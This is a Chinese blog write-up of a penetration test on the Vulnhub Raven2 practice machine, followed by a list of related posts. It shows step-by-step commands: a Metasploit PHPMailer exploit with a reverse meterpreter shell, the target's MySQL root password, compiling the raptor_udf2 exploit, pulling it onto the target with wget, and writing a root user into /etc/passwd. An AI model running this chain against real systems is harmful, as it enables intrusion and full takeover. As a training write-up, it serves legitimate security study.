Raven2靶机渗透测试

最新推荐文章于 2024-08-15 01:26:58 发布
最新推荐文章于 2024-08-15 01:26:58 发布
阅读量413 收藏 7
点赞数 8
文章标签: 网络安全 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liumx0105/article/details/134823104
版权

先对目标靶机的网段进行扫描,用nmap命令

nmap -sS 10.9.63.0/24

在这里插入图片描述
发现目标IP为10.9.63.96(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有22、80、111端口开放,打开网页输入ip查看一下80端口http服务网页
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/fd6150d8a37a4761aaf7d75056fbe6be.png
用nmap进行详细信息扫描

nmap -sT -sV -sC -O -p22,80,111 10.9.63.96

在这里插入图片描述
在用dirb扫描一下目录

dirb http://10.9.63.96

在这里插入图片描述
在这里插入图片描述
发现有这个目录,我们复制链接打开看一下有什么信息内容
在这里插入图片描述
发现了一些目录,按个看看搜集有用信息
在这里插入图片描述
根据搜集到的信息,网站使用apacbe框架,用了PHPMailer,是发送邮件的一个扩展包,版本是5.2.16
在这里插入图片描述
我们用kali里面的搜索漏洞工具msf搜索一下PHPMailer
在这里插入图片描述
发现两个漏洞,我们查看一下怎么使用

info 0

在这里插入图片描述
使用这个漏洞

use 0

在这里插入图片描述
发现没有攻击载合,给了一个默认的攻击载合,我们就用它给的默认载合

set payload php/meterpreter/reverse_tcp

在这里插入图片描述
看一下配置信息

show options

在这里插入图片描述
根据要求配置一下信息

set RHOSTS 10.9.63.96
set TARGETURI /contact.php
set WEB_ROOT /var/www/html
run

在这里插入图片描述
然后复制红框里的目录,在网页打开,利用shell反弹进去,大约需要5分钟
在这里插入图片描述
进来之后输入shell,然后输入python3 -c “import pty;pty.spawn(‘/bin/bash’)”,进入交互模式
在这里插入图片描述
然后找到这个文件cat一下,找到里面数据库的账号和密码
在这里插入图片描述
在这里插入图片描述
登录进入数据库,输入账号和密码(root,R@v3nSecurity)

mysql -uroot -p

在这里插入图片描述
在开启一个终端,查找 mysql udf 漏洞

searchsploit mysql udf

在这里插入图片描述
下载1518.c文件

searchsploit -m 1518.c

在这里插入图片描述
vim一下根据里面的使用方法进行配置
在这里插入图片描述
更改文件名称为raptor_udf2.c,按照下面配置进行操作

mv 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

在这里插入图片描述
再次进入到数据库

mysql -u root -p

在这里插入图片描述
开启http服务

python3 -m http.server 80

在这里插入图片描述
在后台服务下载raptor_udf2.so文件,下载到了/tmp目录下

wget 10.9.63.146/raptor_udf2.so

在这里插入图片描述
进入数据库,在mysql数据库中操作

insert into lmx values(load_file('/tmp/raptor_udf2.so'));
select * from lmx into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;

在这里插入图片描述
设置一个新密码

mkpasswd

在这里插入图片描述
写入一个用户

select do_system('echo "lmxyyds:56Xh0RAeByXi.:0:0::/root:/bin/bash">>/etc/passwd');

在这里插入图片描述
退出数据库,cat一下用户里面新增没有

cat /etc/passwd

在这里插入图片描述
在这里插入图片描述
发现已经有刚刚新增的用户了,使用 su 命令切换用户

su lmxyyds

在这里插入图片描述
进入root管理员用户查看id,发现uid为0,已经是管理员权限,提权成功啦!!!
我们cat一下root下的root.txt文件,goodjob you!
在这里插入图片描述

刘怼怼灬
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
3-Raven2百个靶机渗透(精写-思路为主)
bmxch的博客
05-08 884
思路清晰先说步骤:1.信息收集,收集到应有的靶机可利用端口。2.用收集到的信息尝试爆破ssh,如果信息足够可用拿到普通用户,最好能一次拿到root3.根据系统版本搜索exp(常规提权),拿到root的shell4.对mysql udf的渗透、提权,思路为主。以上就是对这个靶机的渗透总结了,这里用了mysql udf提权,这个方法现在已经不常用了5.1以后的版本基本无法使用,但是思路是永不过期的,希望大家能好好学习思路,而不是花里胡哨的漏洞偏门。
渗透测试靶机---Raven2
久恙502的博客
10-18 108
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Raven2靶机渗透
weixin_58954236的博客
10-14 308
经查找发现PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。按照需求配置参数,先配置靶机的IP和邮箱功能页面和绝对路径,在查看设置可以发现kali反弹shell的IP是本机IP。脚本需要进行一些修改,需要知道网站的绝对路径,能够在前面vendor下的PATH中能够得到flag1和网站的绝对路径。只允许本地登录,所以不能使用msf进行提权了,使用searchsploit查看漏洞脚本。python开启http服务。
【VulnHub】Raven: 2靶机渗透测试
大方子
06-28 4128
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
【VulnHub】Raven靶机渗透测试 打靶记录
weixin_70045024的博客
10-08 296
【VulnHub】Raven靶机渗透测试 打靶记录
Raven2--靶机实操详解
qq_61802750的博客
10-14 696
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
Raven2渗透测试
weixin_56537388的博客
06-13 282
查看wp-config.php文件,发现什么都没有,打开wp-login.php,发现url由我们输入的ip地址变成了raven.local我们需要做的是配置电脑的hosts文件使域名解析到我们的kali主机ip地址。靶机下载地址:链接:https://pan.baidu.com/s/1z2uHZHtn4FROnf_av-2voA。发现目录主要由三部分构成:manual,wordpress,vendor,分别进行访问。可以看到,除了默认的1,2,254,那么192.168.182.132就是目标ip。
Vulnhub-Raven1 靶机练习
GloryGod的博客
08-20 126
进行端口扫描,记录有用信息,有22,80,111等端口开放着手从简入繁,首先对80端口进行渗透信息收集,目录扫描等方式可知 wordpress,并存在 phpmailer服务,可以进行漏洞利用getshell方法利用 phpmailer 服务的exp利用wpscan获取用户名,再利用 hydra 进行密码爆破,随网站登录失败,但可ssh登录getshell一个用户之后,利用数据库信息,getshell另一个用户提权方法利用数据库进行 UDF 提权。
Vulnhub靶机渗透之 RAVEN: 1
_Co1a
07-30 1906
靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networki
oscp推荐的训练靶机raven2渗透过程
07-05
Raven2 是 OSCP 认证考试中的一个训练靶机,旨在测试考生对渗透测试的理解和应用能力。本文将详细介绍 Raven2 渗透过程,包括信息侦察、漏洞利用、提权等阶段。 一、信息侦察阶段 信息侦察是渗透测试的首要阶段,...
recon-raven:渗透测试和漏洞赏金的侦察工具
04-27
渗透测试和漏洞赏金的侦察工具 如何安装? #> ./install.sh 用法 #> rraven 或者 #> ruby rranven.rb 支持功能和待办事项清单 子域发现(模糊) 子域接管漏洞 子域ping(连接检查) 端口扫描和子域端口扫描 ...
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包...
Raven
10-25
2. **字形结构**:每个字母、数字和符号的形状和比例都是经过精心设计的,以确保在不同尺寸下都能保持良好的可读性。Raven字体可能有粗体、常规体、斜体等多种变体,以适应不同的设计需求。 3. **对比度与间距**:...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8388
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
最新发布
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 176
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
[Qt][Qt窗口][下]详细讲解
SnowK博客
08-13 3677
[Qt][Qt窗口][下]详细讲解
mysql介绍
weixin_57763462的博客
08-14 300
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值